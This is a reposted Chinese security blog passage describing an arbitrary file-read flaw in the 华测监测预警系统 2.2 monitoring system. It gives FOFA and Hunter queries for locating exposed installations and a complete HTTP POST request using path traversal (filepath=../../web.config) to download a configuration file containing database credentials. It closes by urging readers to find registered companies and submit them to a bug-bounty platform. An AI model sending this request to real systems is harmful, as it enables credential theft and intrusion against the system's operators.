前言
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
1. 资产搜集
直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了
FOFA语法 app=”华测监测预警系统2.2”
Hunter语法 web.body=”华测监测预警系统2.2”
2. 漏洞复现
这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。
POST /Handler/FileDownLoad.ashx HTTP/1.1
Host: ip:port
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
filename=1&filepath=../../web.config
这里的filename随便传参,只是一个文件名字。
filepath是文件路径,这里访问后会直接下载文件到本地。
文件里包含了数据库的账号密码
3. 实战总结
最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!!!
★
原文始发于微信公众号(渗透安全团队):华测监测预警系统 2.2 | 任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论